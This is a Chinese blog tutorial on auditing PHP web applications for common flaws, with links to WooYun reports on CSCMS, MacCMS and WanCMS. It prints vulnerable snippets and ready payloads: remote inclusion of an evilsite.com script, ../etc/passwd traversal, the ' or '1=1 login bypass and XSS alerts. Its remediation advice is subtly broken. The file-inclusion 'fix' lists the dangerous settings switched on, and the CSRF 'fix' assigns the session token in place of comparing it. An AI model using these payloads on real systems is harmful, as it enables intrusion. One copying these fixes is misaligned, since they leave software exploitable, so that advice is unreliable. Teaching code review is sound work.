<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="关注网络安全">
  <meta name="keyword" content="web安全 代码审计">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      影风博客
    
  </title>
  <link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
  
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>
  
    <script src="/js/qrious.js"></script>
  
  
  
  
    <!-- MathJax support START -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    <!-- MathJax support END -->
  


</head>
<div class="wechat-share">
  <img src="/css/images/logo.png">
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>影风博客</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">主页</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">所有文章</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">标签</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">关于</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">主页</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">所有文章</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">标签</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">关于</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2></h2>
  <p class="post-date">2019-07-27</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><h2 id="0x00-背景"><a href="#0x00-背景" class="headerlink" title="0x00 背景"></a>0x00 背景</h2><p>感谢各位的评论与讨论，经过研讨的地方在文章中标出。</p>
<p>先翻译整理一篇英文<code>paper</code>，后面再填上自己新发现的例子，先思路再实例<code>O(∩_∩)O</code></p>
<p>补充之前第一篇文章中思路，重新加入了最近发现的一些实例（也有部分来自<code>wooyun</code>上的牛人们已公开的漏洞，漏洞归属原作者并均在文章内标明）</p>
<p>（感谢瞌睡龙指导：注意各种漏洞的前提配置环境，先列出来，之后详细说）</p>
<p>在文章中的测试条件下，我们的配置默认是这样子的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">safe_mode = off (避免各种奇奇怪怪的失败)</span><br><span class="line">disabled_functions = N/A (可以使用全部函数，免得莫名其妙的不能用)</span><br><span class="line">register_globals = on (注册全局变量)</span><br><span class="line">allow_url_include = on ( 文件包含时的限制，如果关了就不能远程)</span><br><span class="line">allow_url_fopen = on ( 文件打开的限制，还是开着吧 )</span><br><span class="line">magic_quotes_gpc = off ( 转义引号和划线和空字符，比如&quot;变成\&quot;)</span><br><span class="line">short_tag_open = on ( 部分脚本会用到 ) </span><br><span class="line">file_uploads = on ( 任意文件上传需要……允许上传文件 )</span><br><span class="line">display_errors = on ( 自己测试时方便，找错误 )</span><br></pre></td></tr></table></figure>

<h2 id="0x01-任意文件包含"><a href="#0x01-任意文件包含" class="headerlink" title="0x01 任意文件包含"></a>0x01 任意文件包含</h2><p>前提：允许<code>url_include</code>，否则就需要上传到绝对路径</p>
<p>提示：可以使用空字节（截断）的技巧，和<code>?</code>问号的使用技巧</p>
<p><code>php</code>中有四个函数与文件包含有关：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">require</span><br><span class="line">require_once 只包含一次</span><br><span class="line">include </span><br><span class="line">include_once 只包含一次</span><br></pre></td></tr></table></figure>

<p>如以下例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $pagina=$_GET[<span class="string">'pagina'</span>];</span><br><span class="line">    <span class="keyword">include</span> $pagina.<span class="string">'logged=1'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>使用空字节的例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00</span><br></pre></td></tr></table></figure>

<p>这样可以去掉末尾的<code>.php</code>后缀</p>
<p>再如以下例子</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $pagina=$_GET[<span class="string">'pagina'</span>];</span><br><span class="line">    <span class="keyword">include</span> $pagina.<span class="string">'logged=1'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>使用<code>?</code>问号的例子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1</span><br></pre></td></tr></table></figure>

<p>这样可以把后面的一大坨东西弄没</p>
<p>如何修复：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_include = on</span><br><span class="line">allow_url_fopen = on</span><br></pre></td></tr></table></figure>

<p>简单来说：不要允许特殊字符出现，过滤<code>/</code>，或者过滤<code>http</code>，<code>https</code>，<code>ftp</code>和<code>SMB</code>，好吧，来举一个乌云上<code>Frears</code>的例子</p>
<p><a href="https://shuimugan.com/bug/view?bug_no=2654" target="_blank">WooYun: ecmall本地文件包含</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//只判断是app是否设置，然后去掉了两端空格</span></span><br><span class="line">$app = <span class="keyword">isset</span>($_REQUEST[<span class="string">'app'</span>]) ? trim($_REQUEST[<span class="string">'app'</span>]) : $default_app;</span><br><span class="line">$act = <span class="keyword">isset</span>($_REQUEST[<span class="string">'act'</span>]) ? trim($_REQUEST[<span class="string">'act'</span>]) : $default_act;</span><br><span class="line"><span class="comment">//很明显可以看出$app是我们可以控制的、由于后面连接了.app.php所以利用的时候要截断。</span></span><br><span class="line">$app_file = $config[<span class="string">'app_root'</span>] . <span class="string">"/&#123;$app&#125;.app.php"</span>;</span><br><span class="line"><span class="comment">//应为是本地包函、所以is_file是为真的</span></span><br><span class="line"><span class="keyword">if</span> (!is_file($app_file))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="string">'Missing controller'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//这里直接就包函了，这么低级的漏洞、我都不好说什么了.</span></span><br><span class="line"><span class="keyword">require</span>($app_file);</span><br></pre></td></tr></table></figure>

<p>还有一些特殊的思路，比如<code>Joker</code>的构造</p>
<p><a href="https://shuimugan.com/bug/view?bug_no=2236" target="_blank">WooYun: 济南大学主站本地文件包含导致代码执行</a></p>
<p>自己去看吧，我还以为只有教科书里边才可能出现……</p>
<p>挖掘的可能方法：全局搜索四个函数，先只管出现在文件中间的<code>require</code>等前后文是否有严格的验证，之后在通读时注意文件前部的<code>include</code></p>
<h2 id="0x02-本地文件包含"><a href="#0x02-本地文件包含" class="headerlink" title="0x02 本地文件包含"></a>0x02 本地文件包含</h2><p>提示：在<code>windows</code>系统下面我们可以用<code>..\</code>来代替<code>../</code>即<code>..%5C</code>( <code>url</code>编码后 )</p>
<p>如下例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $pagina=$_GET[<span class="string">'pagina'</span>];</span><br><span class="line">    <span class="keyword">include</span> <span class="string">'/pages/'</span>.$pagina;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>利用的例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p>空字节截断和问号的技巧通用，其实和上面的差不多，只不过是用到了跨目录</p>
<p>修复方式：过滤点和斜杠</p>
<h2 id="0x03-任意文件下载"><a href="#0x03-任意文件下载" class="headerlink" title="0x03 任意文件下载"></a>0x03 任意文件下载</h2><p>前提：<code>url_fopen</code>为<code>on</code>时才能打开远程文件，但一般意义上的任意文件下载不是”远程”的</p>
<p>相比上一篇文章补充：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents  读取整个文件到字符串中</span><br><span class="line">readfile           显示整个文件</span><br><span class="line">file               读进数组</span><br><span class="line">fopen              打开文件或URL</span><br><span class="line">highlight_file     高亮显示源码</span><br><span class="line">show_source        显示源代码</span><br></pre></td></tr></table></figure>

<p>例子同上一篇文章</p>
<h2 id="0x04-SQL注入"><a href="#0x04-SQL注入" class="headerlink" title="0x04 SQL注入"></a>0x04 SQL注入</h2><p>前提：<code>magic_quotes_gpc = off</code>当然指的是字符型的注射，如果是数字型就仍然可以盲注</p>
<p>补充登陆绕过的情况：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$postbruger = $_POST[<span class="string">'username'</span>];</span><br><span class="line">$postpass = md5($_POST[<span class="string">'password'</span>]); </span><br><span class="line">$resultat = mysql_query(<span class="string">"SELECT * FROM "</span> . $tablestart . <span class="string">"login WHERE brugernavn = '$postbruger' AND password = '$postpass'"</span>) </span><br><span class="line"><span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"&lt;p&gt;"</span> . mysql_error() . <span class="string">"&lt;/p&gt;\n"</span>);</span><br></pre></td></tr></table></figure>

<p>这时利用时会方便很多</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username:admin &apos; or &apos;1=1</span><br><span class="line">password:sirgod</span><br></pre></td></tr></table></figure>

<p>挖掘方法：在登陆逻辑处发现注射，不急着跑表，可以考虑绕过登陆</p>
<h2 id="0x05-命令执行"><a href="#0x05-命令执行" class="headerlink" title="0x05 命令执行"></a>0x05 命令执行</h2><p>参考《高级<code>PHP</code>应用程序漏洞审核技术》（<code>Ph4nt0m Security Team</code>），小伙伴们都去百度一下吧（以下节选一小部分有关命令执行的内容）</p>
<h3 id="5-4-代码注射"><a href="#5-4-代码注射" class="headerlink" title="5.4 代码注射"></a>5.4 代码注射</h3><p>5.4.1 <code>PHP</code>中可能导致代码注射的函数</p>
<p>很多人都知道<code>eval</code>、<code>preg_replace+/e</code>可以执行代码，但是不知道<code>php</code>还有很多的函数可以执行代码如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">assert()</span><br><span class="line">call_user_func()</span><br><span class="line">call_user_func_array()</span><br><span class="line">create_function()</span><br></pre></td></tr></table></figure>

<p>变量函数</p>
<p>这里我们看看最近出现的几个关于<code>create_function()</code>代码执行漏洞的代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//how to exp this code</span></span><br><span class="line">$sort_by=$_GET[<span class="string">"sort_by"</span>];</span><br><span class="line">$sorter=<span class="string">"strnatcasecmp"</span>;</span><br><span class="line">$databases=<span class="keyword">array</span>(<span class="string">"test"</span>,<span class="string">"test"</span>);</span><br><span class="line">$sort_function=<span class="string">"return 1*"</span>.$sorter.<span class="string">"($a["</span><span class="string">".$sort_by."</span><span class="string">"],$b["</span><span class="string">".$sort_by."</span><span class="string">"]);"</span>;</span><br><span class="line">usort($databases, create_function(<span class="string">"$a, $b"</span>, $sort_function));</span><br></pre></td></tr></table></figure>

<p>漏洞审计策略</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP版本要求：无</span><br><span class="line">系统要求：无</span><br><span class="line">审计策略：查找对应函数（assert,call_user_func,call_user_func_array,create_function等）</span><br></pre></td></tr></table></figure>

<p>5.4.2 变量函数与双引号</p>
<p>对于单引号和双引号的区别，很多程序员深有体会，示例代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="string">'$a\n'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"$a\n"</span>;</span><br></pre></td></tr></table></figure>

<p>我们再看如下代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//how to exp this code</span></span><br><span class="line"><span class="keyword">if</span>($globals[<span class="string">"bbc_email"</span>])&#123;</span><br><span class="line">$text = preg_replace(</span><br><span class="line"><span class="keyword">array</span>(<span class="string">"/\[email=(.*?)\](.*?)\[\/email\]/ies"</span>,</span><br><span class="line"><span class="string">"/\[email\](.*?)\[\/email\]/ies"</span>),</span><br><span class="line"><span class="keyword">array</span>(<span class="string">"check_email("</span>$<span class="number">1</span><span class="string">", "</span>$<span class="number">2</span><span class="string">")"</span>,</span><br><span class="line"><span class="string">"check_email("</span>$<span class="number">1</span><span class="string">", "</span>$<span class="number">1</span><span class="string">")"</span>), $text);</span><br></pre></td></tr></table></figure>

<p>另外很多的应用程序都把变量用<code>&quot;&quot;</code>存放在缓存文件或者<code>config</code>或者<code>data</code>文件里，这样很 容易被人注射变量函数。</p>
<p>漏洞审计策略：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PHP版本要求：无</span><br><span class="line">系统要求：无</span><br><span class="line">审计策略：通读代码</span><br></pre></td></tr></table></figure>

<h2 id="0x06-跨站脚本漏洞XSS"><a href="#0x06-跨站脚本漏洞XSS" class="headerlink" title="0x06 跨站脚本漏洞XSS"></a>0x06 跨站脚本漏洞XSS</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $name=$_GET[<span class="string">'name'</span>];</span><br><span class="line">    <span class="keyword">print</span> $name;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//http://127.0.0.1/test.php?name=&lt;script&gt;alert("XSS")&lt;/script&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$name=addslashes($_GET[<span class="string">'name'</span>]);</span><br><span class="line"><span class="keyword">print</span> <span class="string">'&lt;table name="'</span>.$name.<span class="string">'"&gt;&lt;/table&gt;'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//http://127.0.0.1/test.php?name="&gt;&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>fromCharCode</code>用来绕过<code>addslashes</code></p>
<p>挖掘方法：关注负责输出的代码，牢记之前程序处理变量的一般逻辑（过滤<code>html</code>标签的力度？）</p>
<h2 id="0x07-变量覆盖"><a href="#0x07-变量覆盖" class="headerlink" title="0x07 变量覆盖"></a>0x07 变量覆盖</h2><p>前提：需要<code>register_gloabals=on</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span> ($logged==<span class="keyword">true</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Logged in.'</span>; &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'Not logged in.'</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//http://127.0.0.1/test.php?logged=1</span></span><br></pre></td></tr></table></figure>

<p>免认证即登陆</p>
<h2 id="0x08-admin节点可被越权访问"><a href="#0x08-admin节点可被越权访问" class="headerlink" title="0x08 admin节点可被越权访问"></a>0x08 admin节点可被越权访问</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/admin/files.php</span><br><span class="line">http://127.0.0.1/admin/db_lookup.php</span><br></pre></td></tr></table></figure>

<p>若是无身份验证直接就能访问，可能存在此漏洞</p>
<p>挖掘方法：先开<code>register_gloabals = on</code>，然后留意第一次出现的变量</p>
<h2 id="0x09-跨站点请求伪造CSRF"><a href="#0x09-跨站点请求伪造CSRF" class="headerlink" title="0x09 跨站点请求伪造CSRF"></a>0x09 跨站点请求伪造CSRF</h2><p>前提：没有<code>token</code> 一般结合<code>XSS</code>来做</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    check_auth();</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'news'</span>]))</span><br><span class="line">    &#123; unlink(<span class="string">'files/news'</span>.$news.<span class="string">'.txt'</span>); &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'File not deleted'</span>); &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//http://127.0.0.1/test.php?news=1</span></span><br></pre></td></tr></table></figure>

<p>会导致文件删除，当然，需要过<code>check_auth</code>，不过在<code>CSRF</code>下不是问题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ($_GET[<span class="string">'func'</span>] == <span class="string">'delete'</span>) &#123;</span><br><span class="line">           $del_id = $_GET[<span class="string">'id'</span>];</span><br><span class="line">           $query2121 = <span class="string">"select ROLE from &#123;$db_prefix&#125;members WHERE ID='$del_id'"</span>;</span><br><span class="line">           $result2121 = mysql_query($query2121) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"delete.php - Error in query: $query2121"</span>);</span><br><span class="line">           <span class="keyword">while</span> ($results2121 = mysql_fetch_array($result2121)) &#123;</span><br><span class="line">           $their_role = $results2121[<span class="string">'ROLE'</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ($their_role != <span class="string">'1'</span>) &#123;</span><br><span class="line">mysql_query(<span class="string">"DELETE FROM &#123;$db_prefix&#125;members WHERE id='$del_id'"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(mysql_error());</span><br></pre></td></tr></table></figure>

<p>关键是在于操作没有任何类型的确认，只要提交请求即可见效</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/index.php?page=admin&amp;act=members&amp;func=delete&amp;id=4</span><br></pre></td></tr></table></figure>

<p>如何修补：<code>token</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    check_auth();</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'news'</span>]) &amp;&amp; $token=$_SESSION[<span class="string">'token'</span>])</span><br><span class="line">    &#123; unlink(<span class="string">'files/news'</span>.$news.<span class="string">'.txt'</span>); &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'Error.'</span>); &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这样就不能伪造啦</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/index.php?delete=1&amp;token=[RANDOM_TOKEN]</span><br></pre></td></tr></table></figure>

<p>挖掘方法：敏感功能如”添加管理员” “修改密码” “直接把<code>shell</code>地址给到别人邮箱里” 观察是否有<code>token</code>验证或者其他形式的验证</p>
<h2 id="0x0a-参考文献"><a href="#0x0a-参考文献" class="headerlink" title="0x0a 参考文献"></a>0x0a 参考文献</h2><p>部分内容参考自:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://www.exploit-db.com/papers/12871/ </span><br><span class="line">Name:Finding vulnerabilities in PHP scripts FULL (with examples) </span><br><span class="line">Author:SirGod Email : sirgod08@gmail.com</span><br></pre></td></tr></table></figure>

<p><code>lxj616@wooyun</code>引用处进行了翻译</p>
<p>以下是最新自己发现的例子</p>
<h2 id="0x0b-CSCMS-V3-5-最新版SQL注射（官方站演示-源码详析）"><a href="#0x0b-CSCMS-V3-5-最新版SQL注射（官方站演示-源码详析）" class="headerlink" title="0x0b CSCMS V3.5 最新版SQL注射（官方站演示+源码详析）"></a>0x0b CSCMS V3.5 最新版SQL注射（官方站演示+源码详析）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=47363" target="_blank">WooYun: CSCMS V3.5 最新版 SQL注射（官方站演示+源码详析）</a></p>
<p><code>PS</code>：<code>CSCMS</code>真是好教材……</p>
<p>感谢<code>@五道口杀气</code>在上一篇的回复：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MVC的代码看一下框架本身实现有没有问题，然后去看model就行了，model有多强，决定了有多大的空间，而变量的过滤在controller里调用时应该几乎是差不多的，所以这类代码从index.php开始读可能也不是太有必要</span><br></pre></td></tr></table></figure>

<p>经过仔细的琢磨，我有了更深的体会，比如本次漏洞中，<code>CSCMS</code>重构了代码，使用了<code>MVC</code>架构，果然是<code>model</code>的<code>xss_clean</code>被误用（或者说<code>model</code>根本没有防范注射的功能），导致<code>controller</code>里面射成一片，因此可以说我之前的”从<code>index.php</code>开始”很不恰当，应当视情况而定</p>
<p>感谢<code>@erevus</code>在上一篇的回复：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">我说说的我经验:</span><br><span class="line"></span><br><span class="line">挖SQL注入，全局搜索select,insert,update这几个关键字,然后找到SQL语句,向上跟,跟到传入变量的地方,看看中途有没有过滤</span><br><span class="line"></span><br><span class="line">挖任意代码执行，全局搜索各种可以执行命令的函数，然后也是一个个看,向上跟（一直没挖到...）</span><br><span class="line"></span><br><span class="line">挖XSS...直接黑盒挖，看看有没有过滤，过滤了的话就去看过滤的代码是怎样，然后看看能不能绕...感觉如果是框架的话，只搜索SELECT关键字可能会有遗漏，因为有很多都是比如：</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$member-&gt;where (<span class="string">"username ='"</span>.$username . <span class="string">"'"</span> )-&gt;save ( $arr_i ); <span class="comment">// 更新状态</span></span><br></pre></td></tr></table></figure>

<p>这样的框架很容易遗漏重要拼接</p>
<p><code>PS</code>:强烈同意<code>erevus</code>的<code>XSS</code>的挖掘方法，因为能力和精力都很有限……</p>
<h2 id="0x0c-MacCMS全版本通杀SQL注射（包括最新7-x）"><a href="#0x0c-MacCMS全版本通杀SQL注射（包括最新7-x）" class="headerlink" title="0x0c MacCMS全版本通杀SQL注射（包括最新7.x）"></a>0x0c MacCMS全版本通杀SQL注射（包括最新7.x）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=48553" target="_blank">WooYun: MacCMS 全版本通杀SQL注射（包括最新7.x）</a></p>
<p>也是重构了代码，加入了<code>360</code>的防护脚本，其实在我发上一个漏洞（<code>6.x</code>）时这个<code>7.x</code>刚好发布，我稍微看了一眼，发现有<code>360</code>防护脚本后就不看了，以为他们肯定全都过滤掉了，直到…… 比较有趣的是他们根本没有在<code>referer</code>上使用<code>360</code>的获取方式，而是直接<code>return $_SERVER[&quot;HTTP_REFERER&quot;];</code>了 因此提醒大家，代码审计就是要仔细，就是要有超人般的耐心，不要想当然。</p>
<h2 id="0x0d-WanCMS-可修改任意用户密码（源码详析-实例演示）"><a href="#0x0d-WanCMS-可修改任意用户密码（源码详析-实例演示）" class="headerlink" title="0x0d WanCMS 可修改任意用户密码（源码详析+实例演示）"></a>0x0d WanCMS 可修改任意用户密码（源码详析+实例演示）</h2><p><a href="https://shuimugan.com/bug/view?bug_no=49284" target="_blank">WooYun: WanCMS 可修改任意用户密码（源码详析+实例演示）</a></p>
<p>我终于又发现了一个敏感业务逻辑上的漏洞</p>
<p>唠叨两句密码学……</p>
<p><code>MD5</code>、<code>SHA</code>是哈希函数，知道<code>$a</code>后容易知道<code>md5($a)</code>，而知道<code>md5($a)</code>难以恢复<code>$a</code>， <code>Des</code>是对称密码，加解密使用同一个密钥</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$reurl=$config [<span class="string">'DOMAIN'</span>].<span class="string">'/accounts/forget_password_t?vc='</span>.md5(md5($username));</span><br></pre></td></tr></table></figure>

<p>这里的密码重置链接 使用的是<code>MD5</code>（两遍），但是用户名我们是知道的，因此直接就能伪造，这也说明了<code>md5</code>并不是用来加密的，应该用<code>DES</code>或者……更常见的方法是<code>MD5</code>中的用户名再加入密码和随机数，或者干脆随机一串字符好了。</p>
